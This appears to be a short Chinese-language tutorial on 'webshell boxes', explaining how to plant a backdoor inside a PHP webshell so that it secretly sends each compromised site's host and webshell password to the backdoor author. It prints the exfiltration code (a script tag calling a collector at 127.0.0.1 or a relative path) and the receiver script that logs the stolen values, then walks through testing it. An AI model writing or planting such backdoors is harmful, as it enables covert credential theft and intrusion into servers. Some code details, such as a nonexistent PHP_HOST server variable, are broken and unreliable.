1、webshell箱子
利用在webshell程序中,植入后门,形成“黑吃黑”,用有后门的木马入侵的网站也就被木马制造者利用。
https://www.0dayhack.com/post-397.html
2、在木马中植入后门
向127.0.0.1发送信息
$url=$_SERVER['HTTP_HOST'].$_SERVER['PHP_HOST'];
echo "<script src=127.0.0.1/test/webshell/index.php?u=$url&p=$password></script>";
OR
$url=$_SERVER['HTTP_HOST'].$_SERVER['PHP_HOST'];
echo "<script src=/test/webshell/index.php?u=$url&p=$password></script>";
将后门植入到已经注入到服务器的木马中

image.png

image.png
3、构造接收端代码
<?
$url=$_GET['u'];
$pass=$_GET['p'];
echo $url."|".$pass;
?>

image.png

image.png
4、访问木马程序
访问木马并开启抓包

image.png
向目标地址发送内容

image.png